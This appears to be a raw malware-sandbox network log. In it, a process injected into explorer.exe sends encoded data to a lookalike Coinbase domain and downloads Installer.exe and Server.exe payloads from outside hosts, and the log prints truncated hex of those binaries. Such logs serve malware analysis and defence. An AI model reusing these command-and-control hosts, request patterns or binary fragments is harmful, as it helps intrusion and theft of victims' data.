Jul 6, 2024 13:27:13.234579086 CEST	657	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyF4Zymma83Qk7bWbvIFMLtPsBuVAkg6Zt61Fn4WMGPijgMm9xF5f4hWTklqNifWd72ZLIOBPEZeLDrTTjs3tN7lG2Vg3SKN1AaXSZLvEfLjvxlxNeuAx5o4t7K8YkO3NHt4sFIBiepkRaQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3e8a5b1e42e0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 32 38 0d 0a 36 33 39 31 31 37 35 38 37 36 32 64 62 38 33 38 37 32 33 65 30 61 37 36 35 62 30 63 64 38 35 37 34 66 63 62 33 61 35 35 0d 0a 30 0d 0a 0d 0a Data Ascii: 2863911758762db838723e0a765b0cd8574fcb3a550

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:13.245085001 CEST	193	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 40
Jul 6, 2024 13:27:13.250129938 CEST	40	OUT	Data Raw: 5f 5d 5f 5e 4d 06 05 44 07 4a 02 18 52 44 79 77 79 77 60 48 60 22 4b 5c 5a 0c 55 10 18 09 49 02 07 55 52 57 04 59 0c 04 Data Ascii: _]_^MDJRDywyw`H`"K\ZUIURWY
Jul 6, 2024 13:27:13.965997934 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8RKrs1X2bjNrK%2F4ycsWWIG5QAmFoJ9ycWUAbI1eFO%2BhVu7Csa6xe21cEBvvh6g63nRxbry1Qd%2FXWYueyZ7xm%2Fim%2BvoHEcceXPws10gWm3Ux2DdbFFFuZNDK5pAgblwVIWAScEdudah3wXk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3e8e48bd0f59-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:13.975198030 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:27:13.980520010 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:27:14.809854984 CEST	1064	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:27:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwljk0OTCZryZaNolPZIXes0Ty%2Bjx3WklAtnwC13z1yOTcoCkm%2BmoLciCm0HbVf%2B21fEonGExs2EZgxVRzSI1PnGS6F4i39TjxI5sQheSocy3QUxTpft7hw7giUzIUJycCM9uVBaLOWAQSc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3e92fac041af-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 31 62 38 0d 0a 06 4f 51 45 45 47 0f 17 18 41 45 13 4c 51 54 5d 59 5b 46 16 1e 0e 45 51 1a 2b 5e 10 10 59 59 5b 51 14 4d 07 4b 04 38 3f 06 4f 51 45 45 47 0f 17 18 5e 40 00 01 16 43 53 18 61 56 17 46 04 45 18 50 1a 55 6e 6e 08 49 5f 40 12 13 11 09 4e 1a 42 41 44 17 58 56 52 5b 51 42 45 1c 0b 10 5f 1c 6b 52 40 45 00 42 4f 52 4e 50 6f 3a 53 18 50 41 43 44 5c 4c 4d 44 16 42 1b 5f 54 5c 5f 58 42 46 16 58 44 55 4b 31 5d 41 4e 52 40 1d 00 48 04 3a 3c 05 1e 58 17 10 48 0f 18 1b 11 14 15 1d 08 52 50 58 5a 4c 42 1f 58 47 5f 18 65 57 16 14 5d 41 16 52 4a 56 68 3a 51 4b 5e 41 16 40 59 4b 17 42 40 43 48 0a 05 56 0f 5c 40 45 1d 56 43 56 18 76 54 5e 53 5c 10 4c 5d 4b 5d 3a 38 03 19 58 15 43 46 0f 4d 1f 14 13 4f 1b 5e 53 03 0d 0b 46 12 1b 5a 44 54 16 44 41 53 54 4c 52 18 57 1c 07 35 39 08 4b 5a 47 11 40 5b 18 19 42 15 47 4d 0d 5f 50 59 5d 13 10 4c 5c 13 52 1a 43 43 5d 50 45 52 1b 5d 4f 53 3f 6e 52 44 5b 4c 43 42 09 4a 1f 16 40 41 1b 15 55 10 10 56 5c 5b 51 04 0a 10 57 08 5b 52 57 5d 5d 42 50 51 54 4a 5e 18 51 0b 0f [TRUNCATED] Data Ascii: 1b8OQEEGAELQT]Y[FEQ+^YY[QMK8?OQEEG^@CSaVFEPUnnI_@NBADXVR[QBE_kR@EBORNPo:SPACD\LMDB_T\_XBFXDUK1]ANR@H:<XHRPXZLBXG_eW]ARJVh:QK^A@YKB@CHV\@EVCVvT^S\L]K]:8XCFMO^SFZDTDASTLRW59KZG@[BGM_PY]L\RCC]PER]OS?nRD[LCBJ@AUV\[QW[RW]]BPQTJ^QDHSWYUFTZEGIV[QAXSRM]:<LGHG_R^KXFLRPNV4;K]LCFKMODO[T^BEBKZ@^XMK8?0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:14.852607965 CEST	144	OUT	GET /Installer.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:15.417437077 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:15 GMT content-type: application/x-msdownload content-length: 631296 server: nginx last-modified: Tue, 02 Jul 2024 08:39:04 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 dd ab b3 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 09 00 00 08 00 00 00 00 00 00 2e b7 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 b6 09 00 57 00 00 00 00 c0 09 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0. @ @W H.text4 `.rsrc@@.reloc@BHgN(L(p(s zz,{$,{$o(.s%.s*((EZ~~(o+(@j~'o+('(P(\.s/(S(-~rp(3rp(4rsJ5~5oK6b~8,~8o8.(-*so(Ps(tk( (~rp(Jrp(K(+o^-(+ohKJo%(s*V-r [TRUNCATED]
Jul 6, 2024 13:27:15.417449951 CEST	224	IN	Data Raw: 70 28 02 00 00 06 2a 02 6f d9 00 00 0a 2a 1b 30 02 00 c7 00 00 00 01 00 00 11 fe 09 00 00 28 07 00 00 0a fe 0e 00 00 7e 08 00 00 0a fe 0e 01 00 fe 0c 00 00 39 8b 00 00 00 fe 0c 00 00 8e 39 81 00 00 00 fe 0c 00 00 73 09 00 00 0a fe 0e 02 00 fe 0c Data Ascii: p(o0(~99s sso9o9o9o&
Jul 6, 2024 13:27:15.417468071 CEST	1236	IN	Data Raw: 2a 00 01 34 00 00 02 00 55 00 12 67 00 13 00 00 00 00 02 00 48 00 37 7f 00 13 00 00 00 00 02 00 36 00 61 97 00 13 00 00 00 00 00 00 00 00 b7 b7 00 0b 01 00 00 01 1b 30 05 00 dd 01 00 00 00 00 00 00 72 01 00 00 70 28 02 00 00 06 17 8d 26 00 00 01 Data Ascii: *4UgH76a0rp(&%,(rp(&%,(rp(&%,(r?p(&%,(rp(&%,(rup(&%,(
Jul 6, 2024 13:27:15.417480946 CEST	1236	IN	Data Raw: 00 00 c0 40 22 00 00 50 41 73 15 00 00 0a 28 16 00 00 0a 02 17 28 17 00 00 0a 02 20 7f 01 00 00 20 bf 00 00 00 73 18 00 00 0a 28 19 00 00 0a 02 72 de 0f 00 70 28 02 00 00 06 28 1a 00 00 0a 02 72 de 0f 00 70 28 02 00 00 06 6f 1b 00 00 0a 02 02 fe Data Ascii: @"PAs(( s(rp((rp(os((((&*0(!(" .l(#-c~&%-&~%s$%&s%%o&%o'o(~~2_,~(G(L
Jul 6, 2024 13:27:15.417495012 CEST	1236	IN	Data Raw: 0a de 0a 09 2c 06 09 6f 0d 00 00 0a dc 73 3c 00 00 0a 25 07 6f 3d 00 00 0a 25 17 6f 3e 00 00 0a 25 16 6f 3f 00 00 0a 25 16 6f 40 00 00 0a 25 17 6f 41 00 00 0a 28 42 00 00 0a 26 16 28 0f 00 00 0a 2a 01 28 00 00 02 00 c9 00 19 e2 00 0e 00 00 00 00 Data Ascii: ,os<%o=%o>%o?%o@%oA(B&(*(q0~'o+(C'~'o+(C&~'oD~(o+(,,!~(E,~(o+(F&~,i~(o+sG~)(
Jul 6, 2024 13:27:15.417506933 CEST	672	IN	Data Raw: 00 00 b5 00 00 00 0e 00 00 00 00 00 00 00 02 00 00 00 ce 00 00 00 3b 00 00 00 09 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 01 00 00 4a 01 00 00 15 00 00 00 01 00 00 01 13 30 04 00 50 00 00 00 07 00 00 11 16 0a 17 0b 16 0c 2b 2e Data Ascii: ;JJ0P+.onYYooonYYoo.+XXonon(p_-0>+oooo.+XXonon(p_-0
Jul 6, 2024 13:27:15.417521000 CEST	1236	IN	Data Raw: 25 16 1f 2c 9d 28 0e 00 00 0a 80 18 00 00 04 72 fd 61 01 70 28 02 00 00 06 17 8d 26 00 00 01 25 16 1f 2c 9d 28 0e 00 00 0a 80 19 00 00 04 72 10 67 01 70 28 02 00 00 06 17 8d 26 00 00 01 25 16 1f 2c 9d 28 0e 00 00 0a 80 1a 00 00 04 72 6d c7 01 70 Data Ascii: %,(rap(&%,(rgp(&%,(rmp(&%,(rp(&%,(rp(&%,(r&p(&%,(rp(&%,(rp(
Jul 6, 2024 13:27:15.417532921 CEST	1236	IN	Data Raw: 28 00 00 04 6f 2b 00 00 0a a2 25 18 72 4b f8 01 70 28 02 00 00 06 a2 25 19 28 9a 00 00 0a 0b 12 01 23 00 00 00 00 00 00 14 40 28 9b 00 00 0a 0b 12 01 72 95 f8 01 70 28 02 00 00 06 28 9c 00 00 0a a2 25 1a 72 df f8 01 70 28 02 00 00 06 a2 28 7c 00 Data Ascii: (o+%rKp(%(#@(rp((%rp((\|s<%o%oA%o>%rjp(o=%o%o@(B&&*0-rp(o`,/rp(r6p(('rp((:
Jul 6, 2024 13:27:15.417546034 CEST	448	IN	Data Raw: 70 28 02 00 00 06 a2 25 17 7e 0f 00 00 04 a2 25 18 72 d5 00 02 70 28 02 00 00 06 a2 25 19 7e 10 00 00 04 a2 25 1a 72 47 01 02 70 28 02 00 00 06 a2 25 1b 7e 15 00 00 04 a2 25 1c 02 a2 25 1d 72 91 01 02 70 28 02 00 00 06 a2 28 7c 00 00 0a 6f ae 00 Data Ascii: p(%~%rp(%~%rGp(%~%%rp((\|o&&*mm0(Qs%orp(((r5p(((4orop(rp((4ooorT
Jul 6, 2024 13:27:15.417587042 CEST	1236	IN	Data Raw: 09 8e 69 32 bd 07 17 58 0b 07 06 8e 69 32 9c 7e 13 00 00 04 2c 0f 7e 11 00 00 04 28 47 00 00 06 28 4c 00 00 06 2a 13 30 03 00 27 01 00 00 00 00 00 00 7e 17 00 00 04 7e 39 00 00 04 02 7b 49 00 00 04 28 57 00 00 06 7e 16 00 00 04 7e 3a 00 00 04 02 Data Ascii: i2Xi2~,~(G(L*0'~~9{I(W~~:{I(W~~;{I(W~~<{I(W~~={I(W~~>{I(W~~?{I(W~~@{I(W~~A{I(W~
Jul 6, 2024 13:27:15.422744989 CEST	1236	IN	Data Raw: 28 02 00 00 06 6f d0 00 00 0a 25 2d 04 26 14 2b 22 03 28 d0 00 00 0a 25 2d 04 26 14 2b 15 03 72 40 07 02 70 28 02 00 00 06 28 34 00 00 0a 28 d0 00 00 0a 0b 07 2d 02 de 5a 07 72 82 07 02 70 28 02 00 00 06 6f d1 00 00 0a 25 2d 04 26 14 2b 05 6f 75 Data Ascii: (o%-&+"(%-&+r@p((4(-Zrp(o%-&+ourp((4(-$(e~PXP,o&*FP0(OsQL(OsQMs"%r&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	64.31.40.18	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:16.324762106 CEST	133	OUT	GET /Server.exe HTTP/1.1 Host: hrdc.pk Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:16.847731113 CEST	988	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 06 Jul 2024 11:27:16 GMT server: LiteSpeed location: https://hrdc.pk/Server.exe Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:16.854095936 CEST	141	OUT	GET /Server.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:17.451699972 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:17 GMT content-type: application/x-msdownload content-length: 179200 server: nginx last-modified: Tue, 02 Jul 2024 10:09:37 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwf @ `lO H.text `.rsrc@@.reloc@BHC**rp********6rpo**"s^>sf%}"**0soo0soosV2osR2osL0/#o ((,#N((o"o"i&lo#"o"k&lo#0"o(,o( [TRUNCATED]
Jul 6, 2024 13:27:17.451745987 CEST	1236	IN	Data Raw: 00 00 5a 02 03 2d 07 72 03 00 00 70 2b 05 72 0f 00 00 70 6f 07 00 00 06 2a 00 13 30 02 00 17 00 00 00 04 00 00 11 16 6a 0a 02 6f 06 00 00 06 12 00 28 0a 00 00 0a 2c 02 06 2a 16 6a 2a 00 3a 02 0f 01 28 0b 00 00 0a 6f 07 00 00 06 2a 00 1e 02 75 0c Data Ascii: Z-rp+rpo0jo(,j:(ouusJ(;-osj(;-o"#"lsZ(;-o&""lsJ(;-o$**r~,(s
Jul 6, 2024 13:27:17.451762915 CEST	1236	IN	Data Raw: 00 00 0a 26 38 90 02 00 00 06 73 80 00 00 06 6f 1a 00 00 0a 07 14 28 3c 00 00 06 2c 0e 07 11 04 06 6f 1b 00 00 0a 6f 11 00 00 06 72 01 00 00 70 13 04 09 16 6f 0f 00 00 0a 06 6f 1b 00 00 0a 0b 38 54 02 00 00 11 05 2c 13 09 02 08 6f 13 00 00 0a 6f Data Ascii: &8so(<,oorpoo8T,oo&8=o-rYpszo&o`,o(Aorpoo>o8,oo&8oo8
Jul 6, 2024 13:27:17.451801062 CEST	1236	IN	Data Raw: 00 06 2a 00 00 00 52 02 14 7d 1a 00 00 04 02 7c 1b 00 00 04 fe 15 05 00 00 02 2a 00 00 00 32 02 7b 1a 00 00 04 73 56 00 00 06 2a 00 00 00 82 02 7b 1a 00 00 04 14 28 3c 00 00 06 2c 11 02 02 7b 1a 00 00 04 6f 1e 00 00 06 7d 1b 00 00 04 2a 00 00 00 Data Ascii: R}\|2{sV{(<,{o}2{sVf("}(-}0{,}{s2z{*0+{3{(-3}+s^
Jul 6, 2024 13:27:17.451812983 CEST	896	IN	Data Raw: 5b 6f 16 00 00 0a 26 02 7b 25 00 00 04 6f 37 00 00 0a 0a 02 7b 26 00 00 04 2c 03 16 10 04 16 0b 2b 46 07 16 31 09 03 1f 2c 6f 16 00 00 0a 26 0e 04 17 33 07 03 6f 3f 00 00 0a 26 0e 04 17 33 0c 03 1f 20 04 05 58 6f 40 00 00 0a 26 02 7b 25 00 00 04 Data Ascii: [o&{%o7{&,+F1,o&3o?&3 Xo@&{%o8XoX23o? o@&]o&JsA}%(Cf("}'(-})0{'.3(
Jul 6, 2024 13:27:17.451824903 CEST	1236	IN	Data Raw: 45 00 00 0a 2a 02 7b 2c 00 00 04 03 04 6f 46 00 00 0a 2a 02 7b 2c 00 00 04 28 49 00 00 0a 0a 12 00 fe 16 23 00 00 01 6f 04 00 00 0a 04 6f 46 00 00 0a 2a 00 00 00 aa 02 7b 2c 00 00 04 03 6f 43 00 00 0a 2d 02 14 2a 02 7b 2c 00 00 04 03 6f 44 00 00 Data Ascii: E{,oF{,(I#ooF{,oC-{,oD{,oJ&0<2{,oG2{,(+{,(oJ&(0Ms}.{,sK(+(+{,(*oJ&
Jul 6, 2024 13:27:17.451837063 CEST	1236	IN	Data Raw: 7b 34 00 00 04 28 40 00 00 06 6f 14 00 00 0a 1f 22 6f 16 00 00 0a 26 2a 00 00 13 30 02 00 46 00 00 00 1b 00 00 11 02 03 28 3d 00 00 06 2c 02 17 2a 03 75 0e 00 00 01 0a 06 2c 0d 02 7b 34 00 00 04 06 28 18 00 00 0a 2a 03 75 11 00 00 02 0b 07 14 28 Data Ascii: {4(@o"o&0F(=,u,{4(u(<,{4{4(2{4o*0F\|5((0 ((,}5{5"}5"{5
Jul 6, 2024 13:27:17.451848030 CEST	448	IN	Data Raw: 00 06 28 06 00 00 2b 26 22 00 00 00 00 2a 3e 02 03 6c 73 bc 00 00 06 28 06 00 00 2b 26 2a 7e 02 23 00 00 00 00 00 00 00 00 73 bc 00 00 06 28 06 00 00 2b 26 23 00 00 00 00 00 00 00 00 2a 3a 02 03 73 bc 00 00 06 28 06 00 00 2b 26 2a 00 ca 7e 0e 00 Data Ascii: (+&">ls(+&~#s(+&#:s(+&~,rps(+&+#s(+&j~,(s(+&ls(+&>s(+&:s(+&2s(+2s(+*6rO
Jul 6, 2024 13:27:17.451929092 CEST	1236	IN	Data Raw: de 00 20 88 13 00 00 28 56 00 00 0a 2b dd 01 1c 00 00 00 00 3d 00 59 96 00 03 02 00 00 01 00 00 9a 00 13 ad 00 03 02 00 00 01 1b 30 01 00 55 00 00 00 00 00 00 00 72 17 01 00 70 28 5a 00 00 0a 7e 3b 00 00 04 28 5b 00 00 0a 2d 0d 7e 3b 00 00 04 28 Data Ascii: (V+=Y0Urp(Z~;([-~;(\&+~;(4&rSp(Z~;(,~;rp$0("*0C(%~P%rp%~Q%rp%~R(](^;
Jul 6, 2024 13:27:17.451982021 CEST	1236	IN	Data Raw: 9d 6f 72 00 00 0a 16 9a 6f 11 00 00 0a 0c 06 08 6f 7b 00 00 0a 16 8d 40 00 00 01 6f 7c 00 00 0a 16 8d 40 00 00 01 6f 7d 00 00 0a 0a de 0a 07 2c 06 07 6f 2f 00 00 0a dc de 03 26 de 00 06 2a 00 00 00 01 28 00 00 02 00 22 00 27 49 00 0a 00 00 00 00 Data Ascii: oroo{@o\|@o},o/&("'I0E ~~r$por\%poorr%po,rz%pr%p&r%p::V(r%p((m0U!r
Jul 6, 2024 13:27:17.456692934 CEST	1236	IN	Data Raw: 00 0a 6f 98 00 00 0a 0b de 0c 11 08 2c 07 11 08 6f 2f 00 00 0a dc de 13 26 72 88 27 00 70 08 28 91 00 00 0a 13 09 dd 5e 01 00 00 07 72 98 27 00 70 6f 81 00 00 0a 2d 0c 72 88 27 00 70 08 28 91 00 00 0a 2a 16 13 06 07 17 8d 40 00 00 01 25 16 1f 20 Data Ascii: o,o/&r'p(^r'po-r'p(*@% or+xX%r'po,r'prpo%r'po,r'prpor'po,r'prpoXi2%r'p%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	192.3.140.185	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:27:18.009499073 CEST	141	OUT	GET /Server.exe HTTP/1.1 Host: www.igenius.org Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity
Jul 6, 2024 13:27:18.630492926 CEST	1236	IN	HTTP/1.1 200 OK date: Sat, 06 Jul 2024 11:27:18 GMT content-type: application/x-msdownload content-length: 179200 server: nginx last-modified: Tue, 02 Jul 2024 10:09:37 GMT accept-ranges: bytes connection: close Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwf @ `lO H.text `.rsrc@@.reloc@BHC**rp********6rpo**"s^>sf%}"**0soo0soosV2osR2osL0/#o ((,#N((o"o"i&lo#"o"k&lo#0"o(,o( [TRUNCATED]
Jul 6, 2024 13:27:18.630513906 CEST	224	IN	Data Raw: 00 00 5a 02 03 2d 07 72 03 00 00 70 2b 05 72 0f 00 00 70 6f 07 00 00 06 2a 00 13 30 02 00 17 00 00 00 04 00 00 11 16 6a 0a 02 6f 06 00 00 06 12 00 28 0a 00 00 0a 2c 02 06 2a 16 6a 2a 00 3a 02 0f 01 28 0b 00 00 0a 6f 07 00 00 06 2a 00 1e 02 75 0c Data Ascii: Z-rp+rpo0jo(,j:(ouusJ(;-osj(;-o"#"lsZ(;-o&""lsJ(;-o$*
Jul 6, 2024 13:27:18.630523920 CEST	1236	IN	Data Raw: 2a 00 72 7e 0e 00 00 04 2c 0d 0f 00 28 0b 00 00 0a 73 ae 00 00 06 2a 02 6c 73 bc 00 00 06 2a 00 00 00 4e 02 14 28 3b 00 00 06 2d 07 02 6f 2a 00 00 06 2a 16 6a 2a 1e 02 73 ca 00 00 06 2a 4a 02 14 28 3b 00 00 06 2d 07 02 6f 28 00 00 06 2a 16 2a 00 Data Ascii: r~,(slsN(;-ojsJ(;-o("(0J3u-,u+u-,u+_,-o.(;(^~-s~0A
Jul 6, 2024 13:27:18.630542994 CEST	224	IN	Data Raw: 04 09 16 6f 0f 00 00 0a 16 13 06 38 a9 01 00 00 11 05 16 fe 01 13 05 11 06 11 05 60 13 06 38 96 01 00 00 11 05 2c 13 09 02 08 6f 13 00 00 0a 6f 16 00 00 0a 26 38 7f 01 00 00 09 6f 1f 00 00 0a 16 fe 02 11 06 60 2c 15 07 11 04 09 6f 04 00 00 0a 11 Data Ascii: o8`8,oo&8o`,o(Aorpo8C9<oo&8)X9of5b.Wf.^8n.8rYEmG+k
